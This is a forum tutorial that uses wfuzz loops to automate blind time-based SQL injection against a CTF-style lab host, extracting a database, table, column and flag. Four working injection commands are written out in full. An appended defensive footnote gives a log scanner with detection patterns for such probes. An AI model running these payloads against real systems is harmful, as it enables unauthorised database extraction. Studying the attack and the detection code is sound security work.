Article: №3 Automating the exploitation of blind Time-based SQL injection using Burp
by OstapBender - Saturday December 16, 2023 at 07:04 PM
Good afternoon, dear forum members!
Continuation of the article "Automating the exploitation of blind Time-based SQL injection using Burp Suite and WFUZZ".
Obviously, the flag is not complete, because I left only 20 characters for the search, but you can compare this piece with what we saw at the beginning of the article and you will realize that we got a part of the real flag.
The whole process took me 20 minutes at most. Manually, in that time we would have been able to extract only half of the table name. Many people will say that in the Burp Suite Community version it takes much longer than in the PRO version. I agree, but in our case using the Community version will increase the time to solve the whole task by 10 minutes. To work with large databases via Time-based, it is best to use one of the fuzzers, which are significantly faster. We'll turn to wfuzz, as it has an option that allows you to specify a range of numbers for fuzzing. Ffuf is also suitable, but for it we would have to create two dictionaries with numbers and fuzz over them.
Wfuzz
We will not reinvent the wheel now, as we already have all the necessary queries from the previous example. Let's just apply them for wfuzz.
Database name

for i in $(seq 1 20); do wfuzz -v -c -z range,32-126 "http://192.168.2.239/?id=1' and IF((ascii(substr(database(),$i,1)))=FUZZ,sleep(5),null)--+-";done > db && grep -F "5." db
[Image: 1699177378986-png.72034]
The search took me exactly 70 seconds. Now let's understand what we are doing here. We run a loop from 1 to 20 in the command line to execute the wfuzz program with our payload and set the range for searching ASCII codes from 32 to 126. The result will be saved to the db file and then the grep command will be executed, which will leave only the values we need (that is, those with a delay of about 5 seconds) and display them all on the screen. Only note that, as you can see, we already have all the characters in the right order. We only need to convert them from ASCII codes back into characters. The further algorithm is the same as in the previous example.
Table names

for i in $(seq 1 20); do wfuzz -v -c -z range,32-126 "http://192.168.2.239/?id=1' and IF(ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1), $i,1))=FUZZ,sleep(5),0)--+-";done > tables && grep -F "5." tables
[Image: 1699177504381-png.72035]
Column name
for i in $(seq 1 20); do wfuzz -v -c -z range,32-126 "http://192.168.2.239/?id=1' and IF(ascii(substring((select column_name from information_schema.columns where table_name='flag_box' limit 1,1), $i,1))=FUZZ,sleep(5),0)--+-";done > columns && grep -F "5." columns
[Image: 1699177568369-png.72036]
Flag
for i in $(seq 1 20); do wfuzz -v -c -z range,32-126 "http://192.168.2.239/?id=1' and IF(ascii(substring((select name from flag_box limit 3,1), $i,1))=FUZZ,sleep(5),0)--+-";done > flag && grep -F "5." flag
[Image: 1699177658008-png.72037]
Well, that's it, I guess. I didn't bother here with normal filtering in the grep command to exclude unnecessary information in the output. I'm just lazy, and I'm already thirsty for beer. I think whoever has the desire will figure out how to organize output to the screen or to a file more nicely and write it in the comments. I will be grateful.
That's all for now. Thank you for your attention!
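A defensive footnote added here (this is not part of OstapBender's post): the loops above leave a very recognisable trace in a web server's access log, a burst of requests from one client whose query string contains a delay call (sleep/benchmark) wrapped in a conditional. The scanner below flags that request shape and counts probes per client IP. The log lines are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache combined-style log lines imitating the wfuzz loop above
# (same client, only the compared ASCII code changes). Not real traffic.
SAMPLE_LOG = """\
10.0.0.7 - - [16/Dec/2023:19:04:01 +0000] "GET /?id=1%27%20and%20IF((ascii(substr(database(),1,1)))=115,sleep(5),null)--+- HTTP/1.1" 200 512
10.0.0.7 - - [16/Dec/2023:19:04:01 +0000] "GET /?id=1%27%20and%20IF((ascii(substr(database(),1,1)))=116,sleep(5),null)--+- HTTP/1.1" 200 512
10.0.0.7 - - [16/Dec/2023:19:04:07 +0000] "GET /?id=1%27%20and%20IF(ascii(substring((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),%201,1))=102,sleep(5),0)--+- HTTP/1.1" 200 512
10.0.0.9 - - [16/Dec/2023:19:05:00 +0000] "GET /?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [16/Dec/2023:19:05:02 +0000] "GET /search?q=sleep%20study%20schedule HTTP/1.1" 200 900
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# A time-based probe needs a delay function AND a conditional around it.
# Requiring both (not the bare word "sleep") keeps ordinary search terms
# like "sleep study" from tripping the rule.
DELAY_RE = re.compile(r'\b(sleep|benchmark|pg_sleep)\s*\(', re.I)
COND_RE = re.compile(r'\b(if|case|ascii|substr|substring|mid)\s*\(', re.I)


def is_time_based_probe(path: str) -> bool:
    """True when the URL-decoded request path has a delay call inside a conditional."""
    decoded = unquote_plus(path)
    return bool(DELAY_RE.search(decoded) and COND_RE.search(decoded))


def scan_log(text: str) -> Counter:
    """Count suspected time-based SQLi probes per client IP."""
    hits = Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_time_based_probe(m.group("path")):
            hits[m.group("ip")] += 1
    return hits


if __name__ == "__main__":
    for ip, n in scan_log(SAMPLE_LOG).most_common():
        print(f"{ip}: {n} suspected time-based SQLi probes")
```

In practice a threshold on the per-IP count (dozens of hits within a minute, as the 95-request-per-character loop produces) is what turns this into an alert; the real fix on the application side is a parameterised query, which makes the injected IF(...) never reach the SQL parser.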